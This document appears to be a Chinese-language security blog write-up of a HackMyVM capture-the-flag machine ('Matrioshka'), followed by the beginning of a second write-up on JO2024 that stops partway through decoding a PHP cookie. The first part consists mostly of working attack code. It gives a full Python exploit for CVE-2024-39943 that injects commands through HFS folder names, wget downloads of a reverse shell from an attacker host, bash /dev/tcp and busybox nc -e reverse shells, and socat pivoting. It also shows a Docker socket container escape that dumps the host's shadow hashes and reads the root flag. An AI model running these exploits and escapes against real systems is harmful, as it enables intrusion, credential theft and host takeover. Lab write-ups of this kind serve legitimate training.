Cookie: hfs_http=eyJ1c2VybmFtZSI6ImFkbWluIiwiaXAiOiIxNzIuMTkuMC4xIiwiX2V4cGlyZSI6MTc2OTMxMDcxNTczNiwiX21heEFnZSI6ODY0MDAwMDB9; hfs_http.sig=44aOyFx6SzoAbSudgg_CfC17Fww
Base64Cmd: d2dldCAxNzIuMTcuMC4xOjgwMDAvcmV2LnNoIC1PIC90bXAvcmV2LnNoCg==
[+] Step 1 add vfs
[+] Step 2 set vfs permission
[+] Step 3 create malicious folder
[+] Step 4 trigger execution
[+] Done

还是没成功

修改代码

#!/usr/bin/env python3
"""
CVE-2024-39943 HFS RCE Exploit - Interactive Mode
"""

import requests as req
import base64
import urllib.parse

# ========== 配置区域 ==========
url = input("Url [http://127.0.0.1:7777/]: ") or "http://127.0.0.1:7777/"
cookie = input("Cookie: ")
reverse_ip = input("Reverse IP [172.17.0.1]: ") or "172.17.0.1"
reverse_port = input("Reverse Port [4444]: ") or "4444"
http_port = input("HTTP Port [8888]: ") or "8888"

if not url.endswith("/"):
    url += "/"

headers = {"x-hfs-anti-csrf": "1", "Cookie": cookie}

def exec_cmd(cmd):
    """执行任意命令"""
    # 添加VFS
    req.post(url + "~/api/add_vfs", headers=headers,
             json={"parent": "/", "source": "/tmp"})
    # 设置权限
    req.post(url + "~/api/set_vfs", headers=headers, json={
        "uri": "/tmp/",
        "props": {"can_see": None, "can_read": None, "can_list": None,
                  "can_upload": "*", "can_delete": None, "can_archive": None,
                  "source": "/tmp", "name": "tmp", "type": "folder", "masks": None}
    })
    # 构造payload
    cmd_b64 = base64.b64encode(cmd.encode('utf-8')).decode('utf-8')
    payload = f'poc";python3 -c "import os;import base64;os.system(base64.b64decode(\'{cmd_b64}\'))"'
    req.post(url + "~/api/create_folder", headers=headers,
             json={"uri": "/tmp/", "name": payload})
    req.get(url + f"~/api/get_ls?path=/tmp/{urllib.parse.quote(payload)}", headers=headers)
    print(f"[+] Executed: {cmd}")

print("\n" + "="*50)
print("HFS RCE Interactive Shell")
print("="*50)
print("Commands:")
print("  1 or download  - 下载reverse_shell.sh")
print("  2 or shell     - 执行反弹shell")
print("  3 or custom    - 执行自定义命令")
print("  help           - 显示准备步骤")
print("  exit           - 退出")
print("="*50)

while True:
    cmd = input("\n> ").strip().lower()

    if cmd in ["1", "download"]:
        exec_cmd(f"wget http://{reverse_ip}:{http_port}/reverse_shell.sh -O /tmp/reverse_shell.sh")

    elif cmd in ["2", "shell"]:
        exec_cmd("bash /tmp/reverse_shell.sh")

    elif cmd in ["3", "custom"]:
        custom = input("Enter command: ")
        exec_cmd(custom)

    elif cmd == "help":
        print(f"""
在matrioshka主机上执行:

1. 创建reverse_shell.sh:
   echo '#!/bin/bash' > /tmp/reverse_shell.sh
   echo 'bash -i >& /dev/tcp/{reverse_ip}/{reverse_port} 0>&1' >> /tmp/reverse_shell.sh

2. 启动HTTP服务:
   cd /tmp && python3 -m http.server {http_port} --bind {reverse_ip}

3. 启动监听:
   nc -lvnp {reverse_port}
""")

    elif cmd == "exit":
        print("Bye!")
        break

    else:
        print("Unknown command. Type: 1/download, 2/shell, 3/custom, help, exit")

┌──(web)─(root㉿kali)-[/home/kali/Desktop/tools/CVE-2024-39943-Poc-main]
└─# python new_poc.py
Url [http://127.0.0.1:7777/]: http://127.0.0.1:7777/
Cookie: hfs_http=eyJ1c2VybmFtZSI6ImFkbWluIiwiaXAiOiIxNzIuMTkuMC4xIiwiX2V4cGlyZSI6MTc2OTMxMjA4NjQ3MiwiX21heEFnZSI6ODY0MDAwMDB9; hfs_http.sig=oBLe_QpYLCtfwWMDMUMpGguRhuw
Reverse IP [172.17.0.1]: 172.19.0.1
Reverse Port [4444]: 4444
HTTP Port [8888]: 8000

==================================================
HFS RCE Interactive Shell
==================================================
Commands:
  1 or download  - 下载reverse_shell.sh
  2 or shell     - 执行反弹shell
  3 or custom    - 执行自定义命令
  help           - 显示准备步骤
  exit           - 退出
==================================================

> 1
[+] Executed: wget http://172.19.0.1:8000/reverse_shell.sh -O /tmp/reverse_shell.sh

matrioshka@matrioshka:/tmp$ echo '#!/bin/bash' > /tmp/reverse_shell.sh
matrioshka@matrioshka:/tmp$ echo 'bash -i >& /dev/tcp/172.19.0.1/4444 0>&1' >> /tmp/reverse_shell.sh
matrioshka@matrioshka:/tmp$ python3 -m http.server 8000 --bind 172.19.0.1
Serving HTTP on 172.19.0.1 port 8000 (http://172.19.0.1:8000/) ...

修改poc

#!/usr/bin/env python3
"""
CVE-2024-39943 HFS RCE - Based on Working WP
"""
import requests as req
import base64
import urllib.parse

print("="*60)
print("CVE-2024-39943 HFS RCE Exploit")
print("="*60)

url = input("Url [http://127.0.0.1:7777/]: ") or "http://127.0.0.1:7777/"
cookie = input("Cookie: ")
reverse_ip = input("Reverse IP [172.19.0.1]: ") or "172.19.0.1"
reverse_port = input("Reverse Port [4444]: ") or "4444"

if not url.endswith("/"):
    url += "/"

headers = {"x-hfs-anti-csrf": "1", "Cookie": cookie}

# Step 1: 添加VFS
print("\n[*] Step 1: 添加 VFS /tmp")
r1 = req.post(url + "~/api/add_vfs", headers=headers,
              json={"parent": "/", "source": "/tmp"})
print(f"    Status: {r1.status_code}")

# Step 2: 设置权限
print("[*] Step 2: 设置 VFS 权限 (允许上传)")
r2 = req.post(url + "~/api/set_vfs", headers=headers, json={
    "uri": "/tmp/",
    "props": {
        "can_see": None, "can_read": None, "can_list": None,
        "can_upload": "*", "can_delete": None, "can_archive": None,
        "source": "/tmp", "name": "tmp", "type": "folder", "masks": None
    }
})
print(f"    Status: {r2.status_code}")

print("\n" + "="*60)
print("[!] 现在请通过HFS Web界面上传 busybox 到 /tmp/ 目录!")
print(f"    访问: {url}")
print("    1. 进入 /tmp/ 文件夹")
print("    2. 点击上传按钮")
print("    3. 上传 busybox 文件")
print("="*60)
input("\n上传完成后按 Enter 继续...")

# Step 3: 创建reverse shell并执行
print("\n[*] Step 3: 通过命令注入执行反弹shell")

# 直接用busybox nc反弹shell
command = f"/tmp/busybox nc {reverse_ip} {reverse_port} -e /bin/bash"
print(f"    Command: {command}")

cmd_b64 = base64.b64encode(command.encode('utf-8')).decode('utf-8')
payload = f'poc";python3 -c "import os;import base64;os.system(base64.b64decode(\'{cmd_b64}\'))"'

# 创建文件夹触发
r3 = req.post(url + "~/api/create_folder", headers=headers,
              json={"uri": "/tmp/", "name": payload})
print(f"    create_folder Status: {r3.status_code}")

# 执行
encoded_payload = urllib.parse.quote(payload)
r4 = req.get(url + f"~/api/get_ls?path=/tmp/{encoded_payload}", headers=headers)
print(f"    get_ls Status: {r4.status_code}")

print("\n" + "="*60)
print("[+] 完成! 检查你的监听器")
print(f"    监听命令: nc -lvnp {reverse_port}")
print("="*60)

订正

hfs_http.sig=f_Q0EvPGzGSWmyCQtHd_gplkGgg;hfs_http=eyJ1c2VybmFtZSI6ImFkbWluIiwiaXAiOiIxNzIuMTkuMC4xIiwiX2V4cGlyZSI6MTc2OTMzOTcyMjM2OSwiX21heEFnZSI6ODY0MDAwMDB9

运行poc后发现/tmp目录下创建文件

127.0.0.1:7777/~/api/get_ls?path=/tmp/poc";python3 -c "import os;import base64;os.system(base64.b64decode('d2dldCAxNzIuMTkuMC4xOjgwMDAvcmV2ZXJzZV9zaGVsbC5zaCAtTyAvdG1wL3Jldi5zaAo=
'))

bmNhdCAxNzIuMTkuMC4xIDQ0NDQgLWUgL2Jpbi9iYXNo为base64后的指令

直接访问即可执行

matrioshka@matrioshka:~$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

环境问题

ssh转发端口不好用啊

好奇怪按理来讲可以的

直接上传内网穿透工具吧

socat或者Ligolo

┌──(web)─(root㉿kali)-[/home/kali/Desktop/tools/socat]
└─# tldr socat

  socat

  Multipurpose relay (SOcket CAT).
  More information: http://www.dest-unreach.org/socat/.

  - Listen to a port, wait for an incoming connection and transfer data to STDIO:
    sudo socat - TCP-LISTEN:8080,fork

  - Listen on a port using SSL and print to stdout:
    sudo socat OPENSSL-LISTEN:4433,reuseaddr,cert=./cert.pem,cafile=./ca.cert.pem,key=./key.pem,verify=0 STDOUT 

  - Create a connection to a host and port, transfer data in STDIO to connected host:                           
    sudo socat - TCP4:www.example.com:80

  - Forward incoming data of a local port to another host and port:                                             
    sudo socat TCP-LISTEN:80,fork TCP4:www.example.com:80                                                       

  - Send data with multicast routing scheme:
    echo "Hello Multicast" | socat - UDP4-DATAGRAM:224.0.0.1:5000

  - Receive data from a multicast:
    socat - UDP4-RECVFROM:5000

matrioshka@matrioshka:/tmp$ ./socat TCP-LISTEN:8000,fork TCP4:172.19.0.2:80 &
[1] 6455

总算成了

先用脚本跑一个，跑出这个文件

然后重命名这个base64代码

然后复制粘贴

192.168.0.105:8000/~/api/get_ls?path=/tmp/poc";python3 -c "import os;import base64;os.system(base64.b64decode('d2dldCAxNzIuMTkuMC4xOjgwMDEvcmV2ZXJzZV9zaGVsbC5zaCAtTyAvdG1wL3JldmVyc2Vfc2hlbGwuc2g='))

matrioshka@matrioshka:/tmp$ python3 -m http.server 8001
Serving HTTP on 0.0.0.0 port 8001 (http://0.0.0.0:8001/) ...
172.19.0.2 - - [24/Jan/2026 07:20:41] "GET /reverse_shell.sh HTTP/1.1" 200 -

成功读取

然后再执行

┌──(web)─(root㉿kali)-[/home/kali/Desktop/tools/CVE-2024-39943-Poc-main]
└─# echo -n "bash /tmp/reverse_shell.sh"|base64

YmFzaCAvdG1wL3JldmVyc2Vfc2hlbGwuc2g=

matrioshka@matrioshka:/tmp$ cat reverse_shell.sh 
#!/bin/bash
bash -i >& /dev/tcp/172.19.0.1/4444 0>&1

matrioshka@matrioshka:/tmp$ busybox nc -lp 4444
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@78d6dd4e44f4:~/.hfs#

容器逃逸

root@78d6dd4e44f4:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@78d6dd4e44f4:/# env
env
HOSTNAME=78d6dd4e44f4
PWD=/
HOME=/root
LS_COLORS=
PKG_EXECPATH=/opt/hfs/hfs
LESSCLOSE=/usr/bin/lesspipe %s %s
LESSOPEN=| /usr/bin/lesspipe %s
SHLVL=2
LC_CTYPE=C.UTF-8
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
_=/usr/bin/env
OLDPWD=/root
root@78d6dd4e44f4:/# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
13: eth0@if14: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ac:13:00:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 172.19.0.2/16 brd 172.19.255.255 scope global eth0
       valid_lft forever preferred_lft forever
root@78d6dd4e44f4:/# cat /proc/1/cgroup 2>/dev/null | head -20
cat /proc/1/cgroup 2>/dev/null | head -20
0::/
root@78d6dd4e44f4:/# capsh --print 2>/dev/null || cat /proc/self/status | grep Cap
<int 2>/dev/null || cat /proc/self/status | grep Cap
WARNING: libcap needs an update (cap=40 should have a name).
Current: = cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap+ep
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap
Ambient set =
Securebits: 00/0x0/1'b0
 secure-noroot: no (unlocked)
 secure-no-suid-fixup: no (unlocked)
 secure-keep-caps: no (unlocked)
 secure-no-ambient-raise: no (unlocked)
uid=0(root) euid=0(root)
gid=0(root)
groups=0(root)
Guessed mode: UNCERTAIN (0)
root@78d6dd4e44f4:/# ls -la /var/run/docker.sock 2>/dev/null; ls -la /.dockerenv 2>/dev/null; ls -la /dev 2>/dev/null | head -30
<env 2>/dev/null; ls -la /dev 2>/dev/null | head -30
srw-rw---- 1 root 111 0 Jan 24 04:34 /var/run/docker.sock
-rwxr-xr-x 1 root root 0 Jan 24 04:35 /.dockerenv
total 4
drwxr-xr-x 5 root root  340 Jan 24 04:35 .
drwxr-xr-x 1 root root 4096 Jan 24 04:35 ..
lrwxrwxrwx 1 root root   11 Jan 24 04:35 core -> /proc/kcore
lrwxrwxrwx 1 root root   13 Jan 24 04:35 fd -> /proc/self/fd
crw-rw-rw- 1 root root 1, 7 Jan 24 04:35 full
drwxrwxrwt 2 root root   40 Jan 24 04:35 mqueue
crw-rw-rw- 1 root root 1, 3 Jan 24 04:35 null
lrwxrwxrwx 1 root root    8 Jan 24 04:35 ptmx -> pts/ptmx
drwxr-xr-x 2 root root    0 Jan 24 04:35 pts
crw-rw-rw- 1 root root 1, 8 Jan 24 04:35 random
drwxrwxrwt 2 root root   40 Jan 24 04:35 shm
lrwxrwxrwx 1 root root   15 Jan 24 04:35 stderr -> /proc/self/fd/2
lrwxrwxrwx 1 root root   15 Jan 24 04:35 stdin -> /proc/self/fd/0
lrwxrwxrwx 1 root root   15 Jan 24 04:35 stdout -> /proc/self/fd/1
crw-rw-rw- 1 root root 5, 0 Jan 24 04:35 tty
crw-rw-rw- 1 root root 1, 9 Jan 24 04:35 urandom
crw-rw-rw- 1 root root 1, 5 Jan 24 04:35 zero
root@78d6dd4e44f4:/# mount | grep -E "(docker|overlay|/dev/)" 2>/dev/null
mount | grep -E "(docker|overlay|/dev/)" 2>/dev/null
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/docker/overlay2/l/ZYCUXWQ2DAAJWEPJDKLO2JXP66:/var/lib/docker/overlay2/l/XYIUP7CXNA67TCTVYSDXIXLC2O,upperdir=/var/lib/docker/overlay2/1788c5b2eb9e9c043c6724165957edfa39599e9a314bd00c4d9deb6d058f2276/diff,workdir=/var/lib/docker/overlay2/1788c5b2eb9e9c043c6724165957edfa39599e9a314bd00c4d9deb6d058f2276/work)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=666)
mqueue on /dev/mqueue type mqueue (rw,nosuid,nodev,noexec,relatime)
shm on /dev/shm type tmpfs (rw,nosuid,nodev,noexec,relatime,size=65536k,inode64)
/dev/sda1 on /etc/resolv.conf type ext4 (rw,relatime,errors=remount-ro)
/dev/sda1 on /etc/hostname type ext4 (rw,relatime,errors=remount-ro)
/dev/sda1 on /etc/hosts type ext4 (rw,relatime,errors=remount-ro)
/dev/sda1 on /opt/hfs/hfs-linux.zip type ext4 (rw,relatime,errors=remount-ro)
tmpfs on /run/docker.sock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=201428k,mode=755,inode64)
/dev/sda1 on /opt/hfs/config.yaml type ext4 (rw,relatime,errors=remount-ro)
/dev/sda1 on /opt/hfs/data type ext4 (rw,relatime,errors=remount-ro)
root@78d6dd4e44f4:/# fdisk -l 2>/dev/null || lsblk 2>/dev/null
fdisk -l 2>/dev/null || lsblk 2>/dev/null
root@78d6dd4e44f4:/# uname -a; cat /etc/os-release 2>/dev/null | head -5
uname -a; cat /etc/os-release 2>/dev/null | head -5
Linux 78d6dd4e44f4 6.1.0-23-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.99-1 (2024-07-15) x86_64 x86_64 x86_64 GNU/Linux
NAME="Ubuntu"
VERSION="20.04.6 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.6 LTS"
root@78d6dd4e44f4:/#

发现 Docker Socket 可访问！这是最直接的逃逸路径。

 root@78d6dd4e44f4:/# docker images
  docker images
  REPOSITORY   TAG       IMAGE ID       CREATED         SIZE
  ubuntu       20.04     9df6d6105df2   17 months ago   72.8MB
  wordpress    latest    e826d932809c   18 months ago   686MB
  mysql        8.0.0     228d71078f8c   8 years ago     433MB

● 有本地镜像，用 ubuntu:20.04：

docker run -d -v /:/host --privileged --pid=host --name pwn ubuntu:20.04 sleep infinity && docker exec pwn chroot /host cat /etc/shadow
docker run -v /:/mnt --rm ubuntu:20.04 chroot /mnt cat /root/root.txt

root@78d6dd4e44f4:~/.hfs# docker exec pwn chroot /host cat /etc/shadow
docker exec pwn chroot /host cat /etc/shadow
root:$y$j9T$.ZHYtx4yIoOs49Rup3HPC1$U2xdQY0N6Qf5frOTNdUHlidiARPMaFXmbqYebm9XJcC:19957:0:99999:7:::
daemon:*:19956:0:99999:7:::
bin:*:19956:0:99999:7:::
sys:*:19956:0:99999:7:::
sync:*:19956:0:99999:7:::
games:*:19956:0:99999:7:::
man:*:19956:0:99999:7:::
lp:*:19956:0:99999:7:::
mail:*:19956:0:99999:7:::
news:*:19956:0:99999:7:::
uucp:*:19956:0:99999:7:::
proxy:*:19956:0:99999:7:::
www-data:*:19956:0:99999:7:::
backup:*:19956:0:99999:7:::
list:*:19956:0:99999:7:::
irc:*:19956:0:99999:7:::
_apt:*:19956:0:99999:7:::
nobody:*:19956:0:99999:7:::
systemd-network:!*:19956::::::
messagebus:!:19956::::::
avahi-autoipd:!:19956::::::
matrioshka:$y$j9T$pyr6bkZZRReL0Ect1iH4J0$ormtnhlW02niDkuRnoYJyXwv7DsX02xiU/HPZsuKFMB:20477:0:99999:7:::
sshd:!:19956::::::

root@78d6dd4e44f4:~/.hfs# docker run -v /:/mnt --rm ubuntu:20.04 chroot /mnt cat /root/root.txt
<nt --rm ubuntu:20.04 chroot /mnt cat /root/root.txt
7f5d6dbbaff0a1fc6d2a5c9160362908

docker逃逸原理介绍● Docker Socket 逃逸原理详解

逃逸前提条件

容器内可访问 Docker Socket (/var/run/docker.sock)
有权限与 Docker Daemon 通信（当前用户是 root 或在 docker 组）
有可用的本地镜像（或网络可拉取镜像）

为什么能逃逸？

Docker Socket 是 Docker Daemon 的 API 接口。拥有它的访问权 = 拥有宿主机 root 权限，因为你可以：

创建特权容器
挂载宿主机任意目录
访问宿主机 PID 命名空间

命令详解

命令 1：完整特权逃逸

docker run -d -v /:/host --privileged --pid=host --name pwn ubuntu:20.04 sleep infinity
┌────────────────┬───────────────────────────────────────────────┐
│ 参数 │ 作用 │
├────────────────┼───────────────────────────────────────────────┤
│ docker run │ 创建并启动新容器 │
├────────────────┼───────────────────────────────────────────────┤
│ -d │ 后台运行（detach），不需要 TTY │
├────────────────┼───────────────────────────────────────────────┤
│ -v /:/host │ 关键：把宿主机根目录 / 挂载到容器的 /host │
├────────────────┼───────────────────────────────────────────────┤
│ --privileged │ 赋予容器所有 capabilities，可访问所有设备 │
├────────────────┼───────────────────────────────────────────────┤
│ --pid=host │ 共享宿主机 PID 命名空间，可看到宿主机所有进程 │
├────────────────┼───────────────────────────────────────────────┤
│ --name pwn │ 容器命名为 pwn，方便后续操作 │
├────────────────┼───────────────────────────────────────────────┤
│ ubuntu:20.04 │ 使用的镜像 │
├────────────────┼───────────────────────────────────────────────┤
│ sleep infinity │ 让容器保持运行不退出 │
└────────────────┴───────────────────────────────────────────────┘
然后：
docker exec pwn chroot /host cat /etc/shadow
┌─────────────────┬──────────────────────────────────────────┐
│ 参数 │ 作用 │
├─────────────────┼──────────────────────────────────────────┤
│ docker exec │ 在运行中的容器执行命令 │
├─────────────────┼──────────────────────────────────────────┤
│ pwn │ 目标容器名 │
├─────────────────┼──────────────────────────────────────────┤
│ chroot /host │ 关键：切换根目录到 /host（即宿主机的 /） │
├─────────────────┼──────────────────────────────────────────┤
│ cat /etc/shadow │ 此时读取的是宿主机的 /etc/shadow │
└─────────────────┴──────────────────────────────────────────┘

命令 2：一次性逃逸

docker run -v /:/mnt --rm ubuntu:20.04 chroot /mnt cat /root/root.txt
┌────────────────────┬─────────────────────────────────────┐
│ 参数 │ 作用 │
├────────────────────┼─────────────────────────────────────┤
│ docker run │ 创建并启动新容器 │
├────────────────────┼─────────────────────────────────────┤
│ -v /:/mnt │ 把宿主机根目录挂载到容器的 /mnt │
├────────────────────┼─────────────────────────────────────┤
│ --rm │ 命令执行完自动删除容器（不留痕迹） │
├────────────────────┼─────────────────────────────────────┤
│ ubuntu:20.04 │ 使用的镜像 │
├────────────────────┼─────────────────────────────────────┤
│ chroot /mnt │ 切换根目录到 /mnt（宿主机文件系统） │
├────────────────────┼─────────────────────────────────────┤
│ cat /root/root.txt │ 读取宿主机的 /root/root.txt │
└────────────────────┴─────────────────────────────────────┘

图示

┌─────────────────────────────────────────┐
│ 宿主机 (Host) │
│ / │
│ ├── etc/shadow │
│ ├── root/root.txt │
│ └── var/run/docker.sock ◄─────────┐ │
│ │ │
│ ┌─────────────────────────────┐ │ │
│ │ 当前容器 (你所在位置) │ │ │
│ │ 可访问 docker.sock ────────┘ │ │
│ │ │ │
│ │ docker run -v /:/mnt ... │ │
│ │ │ │ │
│ │ ▼ │ │
│ │ ┌──────────────────┐ │ │
│ │ │ 新建容器 (pwn) │ │ │
│ │ │ /mnt ──► 宿主机/ │ │ │
│ │ │ chroot /mnt │ │ │
│ │ │ = 宿主机 root! │ │ │
│ │ └──────────────────┘ │ │
│ └─────────────────────────────┘ │ │
└─────────────────────────────────────────┘

总结

本质：通过 Docker Socket 创建一个挂载宿主机文件系统的新容器，然后用 chroot 切换到宿主机环境，实现逃逸。

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hmvmachines/matrioshka/

HMV-JO2024

呼啸山庄 — Fri, 23 Jan 2026 00:00:00 GMT

信息收集

IP定位

┌──(web)─(root㉿kali)-[/home/kali]
└─# arp-scan -l | grep "08:00:27"                        

192.168.0.114   08:00:27:60:9b:44       (Unknown)

rustscan扫描

┌──(web)─(root㉿kali)-[/home/kali]
└─# rustscan -a 192.168.0.114 -- -A
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.0.114:22
Open 192.168.0.114:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.0.114
Depending on the complexity of the script, results may take some time to appear.

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 e7:ce:f2:f6:5d:a7:47:5a:16:2f:90:07:07:33:4e:a9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLuHH80SwA8Qff3pGOY4aBesL0Aeesw6jqX+pbtR9O7w8jlbyNhuHmjjABb/34BxFp2oBx8o5xuZVXS1cE9nAlE=
|   256 09:db:b7:e8:ee:d4:52:b8:49:c3:cc:29:a5:6e:07:35 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICKFE9s2IvPGAJ7Pt0kSC8t9OXYUrueJQQplSC2wbYtY
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.61 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.61 (Debian)
|_http-title: Paris 2024 Olympic Games
MAC Address: 08:00:27:60:9B:44 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/16%OT=22%CT=%CU=42253%PV=Y%DS=1%DC=D%G=N%M=080027
OS:%TM=696B14E4%P=x86_64-pc-linux-gnu)SEQ(SP=FE%GCD=1%ISR=109%TI=Z%CI=Z%II=
OS:I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%
OS:O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W
OS:6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=
OS:O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD
OS:=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0
OS:%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1
OS:(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI
OS:=N%T=40%CD=S)

Uptime guess: 14.699 days (since Fri Jan  2 07:03:36 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=254 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.36 ms 192.168.0.114

目录扫描

┌──(web)─(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.0.114    

  _|. _ _  _  _  _ _|_    v0.4.3.post1                  
 (_||| _) (/_(_|| (_| )                                 
                                                        
Extensions: php, aspx, jsp, html, js | HTTP method: GET
Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/_192.168.0.114/_26-01-16_23-52-26.txt

Target: http://192.168.0.114/

[23:52:26] Starting:                                    
[23:52:28] 403 -  278B  - /.ht_wsr.txt
[23:52:28] 403 -  278B  - /.htaccess.bak1
[23:52:28] 403 -  278B  - /.htaccess.sample
[23:52:28] 403 -  278B  - /.htaccess.save
[23:52:28] 403 -  278B  - /.htaccess.orig
[23:52:28] 403 -  278B  - /.htaccess_extra
[23:52:28] 403 -  278B  - /.htaccess_sc
[23:52:28] 403 -  278B  - /.htaccessOLD
[23:52:28] 403 -  278B  - /.htaccess_orig
[23:52:28] 403 -  278B  - /.htaccessBAK
[23:52:28] 403 -  278B  - /.htaccessOLD2
[23:52:28] 403 -  278B  - /.html
[23:52:28] 403 -  278B  - /.htm
[23:52:28] 403 -  278B  - /.htpasswd_test
[23:52:28] 403 -  278B  - /.htpasswds
[23:52:28] 403 -  278B  - /.httr-oauth
[23:52:28] 403 -  278B  - /.php
[23:52:47] 301 -  312B  - /img  ->  http://192.168.0.114/img/
[23:53:00] 403 -  278B  - /server-status
[23:53:00] 403 -  278B  - /server-status/

Task Completed

┌──(web)─(root㉿kali)-[/home/kali]
└─# gobuster dir -u 192.168.0.114 -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js,yaml -t 64
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.114
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,html,zip,db,bak,js,yaml,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 278]
/index.php            (Status: 200) [Size: 7812]
/.php                 (Status: 403) [Size: 278]
/img                  (Status: 301) [Size: 312] [--> http://192.168.0.114/img/]
/preferences.php      (Status: 200) [Size: 3163]
/.php                 (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]

/preferences.php

<body>
    <div class="container">
        <header>Welcome to Your Personalized Page!</header>
        <div class="content">
                            <div class="message">
                    <p>No user preferences were found or the cookie has expired. Please check your cookie settings or contact the site administrator if the problem persists.</p>
                </div>
                    </div>
    </div>
</body>
</html>

<body>
    <div class="container">
        <header>Welcome to Your Personalized Page!</header>
        <div class="content">
                            <div class="preferences">
                    <p>Your language setting is fr.</p>
                    <p>Your background color is #ddd.</p>
                </div>
                    </div>
    </div>
</body>
</html>

首次访问没有偏好 → 第二次访问有偏好 → 说明偏好信息存储在 Cookie 里。
题目可能是 利用 Cookie 篡改或解码获取 flag。

TzoxNToiVXNlclByZWZlcmVuY2VzIjoyOntzOjg6Imxhbmd1YWdlIjtzOjI6ImZyIjtzOjE1OiJiYWNrZ3JvdW5kQ29sb3IiO3M6NDoiI2RkZCI7fQ%3D%3D

（URL 编码 + Base64）

第一步：URL Decode

TzoxNToiVXNlclByZWZlcmVuY2VzIjoyOntzOjg6Imxhbmd1YWdlIjtzOjI6ImZyIjtzOjE1OiJiYWNrZ3JvdW5kQ29sb3IiO3M6NDoiI2RkZCI7fQ==

第二步：Base64 Decode

